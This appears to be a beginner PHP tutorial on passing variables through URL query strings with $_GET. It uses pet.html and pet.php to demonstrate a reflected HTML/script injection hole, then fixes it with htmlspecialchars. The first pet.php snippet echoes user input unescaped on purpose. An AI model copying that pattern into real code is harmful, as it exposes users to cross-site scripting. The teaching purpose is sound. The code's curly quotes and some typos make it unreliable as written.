Understanding the methods we may use to communicate data about a user’s interaction together with a request for a new web page is the key to building interactivity with PHP. It turns out that PHP makes this quite simple.
Let’s talk about how passing variables in links? How easy it is to query a string.
Utilizing the URL is the easiest approach to convey data along with a page request query text. If you’ve ever seen a URL with a question mark after it. You’ve probably encountered this tactic before. For instance, if you look for when you search for “sitepoint” on a search engine, a page of search results with a URL like this:
Do you see the “?” in the URL? The words after the question mark consists of your search term (sitepoint). The transmission of that information using the http://www.sample.com/search command.
Let’s create our own simple example in code. Make a standard HTML document called pet.html (because there won’t be any PHP, there is no need for the .php filename extension code in this file), then add the following link:
<a href=”pet.php?pet=Cat”>Cat</a>
This is a link to a pet.php file, but in addition to just connecting to the file, you’re also sending a variable with the page request. The parameter is sent in part of the URL that comes after the inquiry in the query string mark, pet is the variable, and cat is its value. Therefore, you’ve established a link that calls pet.php and tells the PHP code in that file that pet is equal cat.
We must look into pet.php in order to fully comprehend the impact of this connection. Create a new file, but notice the .php filename extension this time. This informs the web server that PHP code can be expected in the file. Add the following:
<?php
$pet = $_GET[‘pet’];
echo ‘My pet is a, ‘ . $pet . ‘!’;
?>
Place these two files (pet.php and pet.html) in the Project folder now, and open the first file in your browser the URL should be http://local_ip_address/pet.html). For the PHP script, use the link on the main page. You should see the message “My pet is a, Cat! “.
Let’s look more closely at the code that enabled this. The most significant line:
$pet = $_GET[‘pet’];
I’m gonna assume that you already know about the concept of array. So one of the many variables that PHP automatically creates is $_GET it generates in response to a browser request. Any values given in the URL query string are stored in the array variable created by PHP called $_GET. The value of the pet variable given in the query string may be retrieved as $_GET[‘pet’] since $_GET is an associative array. Your pet.php script writes this value to a common PHP variable ($pet), and then uses an echo command to show it as part of a text string:
echo ‘My pet is a, ‘ . $pet . ‘!’;
Using the string concatenation operator (.) the value of the $pet variable is added to the output string.
But be careful! This code is missing a security feature! Although PHP is a simple programming language to learn, it turns out that if you don’t know what security measures to take, it’s also quite simple to introduce security vulnerabilities into websites that use PHP. Since it’s arguably the most prevalent security problem on the Web right now, I want to make sure you can identify and address it before we continue.
The pet.php script’s creation of a page with content that is controlled by the user — in this example, the $pet variable — causes a security problem. A malicious user might alter the URL to transmit a new value for the pet variable even though the $pet variable would typically get its value from the URL query string in the link on the pet.html page.
Click the link in pet.html to see how it might work. Look at the URL in your browser’s address bar when you view the ensuing page (with the greeting features my pet “Cat”). It should look like this:
http://local_ip_address/pet.php?pet=Cat
Edit the URL by adding a tag <u> </u> to the value of the variable pet, to look like this:
http://local_ip_address/pet.php?pet=<u>Cat</u>
Hit Enter to load this new URL, and note that your Cat string will now be underlined.
See what’s going on right here? Any HTML code can be entered by the user into the URL, and it is without a doubt included in the created page’s code by your PHP script. By knowing this a hostile user could include complex JavaScript code that carries out a menial task, such as obtaining the user’s password. All the attacker would need to do is lure one of your users into clicking the updated link after publishing it on a different website under their control. The link can even be sent to your users in an email that has been included by the attacker. The attacker’s code would be added to your page and the trap would be set if one of your users clicked the link.
I’m sorry to worry you with this discussion of hostile hackers using your own PHP code against you to harm your users, especially when you’re still learning the language. The truth is that how simple it is to add security concerns like this is PHP’s worst flaw as a language. Many of the efforts put into learning how to code PHP to a professional quality, according to some, are devoted to preventing security flaws. However, the earlier you are exposed to these problems, the sooner you develop a habit of avoiding them, and the less of a challenge they will be for you moving forward.
So how can we create a page without leaving it vulnerable to misuse by intruders? To fix is to consider the $pet variable value as plain text that will be shown on your website rather than HTML that will be included into the page’s code. Let me explain what I mean as this is a minor distinction.
Reopen your pet.php file and make the following changes to the PHP code inside:
<?php
$pet = $_GET[‘pet’];
echo ‘My pet is a, ‘ .
htmlspecialchars($pet, ENT_QUOTES, ‘UTF-8’) . ‘!’;
?>
Let me break down this code for you because there is a lot going on there.
The first line still assigns the value of the ‘pet’ member from the $_GET array to $pet as it did before. However, the subsequent echo statement is remarkably different. This version of the code leverages the built-in PHP function htmlspecialchars to carry out a crucial conversion, whereas the previous version of the code merely put the $pet variable, naked, into the echo statement.
Remember that the security flaw exists because HTML code from the $pet variable is directly injected into the created page’s code in pet.php, making it possible for it to do any action that HTML code is capable of. In order to prevent the browser from interpreting “special HTML characters” as HTML code, htmlspecialchars converts them into HTML character entities like < and >. I’ll show you how to do this shortly.
Let’s first examine more closely this new code. The first instance of a PHP function that accepts multiple argument call the htmlspecialchars function. The function call itself is seen below:
htmlspecialchars($pet, ENT_QUOTES, ‘UTF-8’) . ‘!’;
The first argument is the $pet variable (the text to be converted). The second argument is the PHP constant. A PHP constant is comparable to a variable whose value cannot be changed. Constants don’t begin with a dollar sign, in contrast to variables. ENT_QUOTES instructs htmlspecialchars to convert single and double quotes in addition to other special characters. PHP includes a number of built-in constants like ENT_QUOTES that are used to control built-in functions like htmlspecialchars. The string “UTF-8” is the third argument, and it instructs PHP the character encoding to use to read the text you provide.
To access your updated pet.php, open pet.html in your browser and click the link there. You’ll notice the notification “My pet is a, Cat! As you did earlier, change the URL to add the pet’s surrounding <u> and </u> tags:
http://local_ip_address/pet.php?pet=<u>Cat</u>
When you hit Enter this time, instead of the pet value being underline in the page, you should see the actual text that you typed as shown, like this:
My pet is a, <u>Cat</>!
If you look at the page’s source code, you may verify that the htmlspecialchars function completed its task by converting the characters into the corresponding entity references. By doing this, malicious individuals are prevented from injecting undesirable code onto your website. If they do anything similar, the code is shown on the page in an unharmful manner as plain text.
So this is only a little introduction about how can PHP be more exciting and interesting as you little by little will discover different kinds of technique on how to use it in a more productive way.
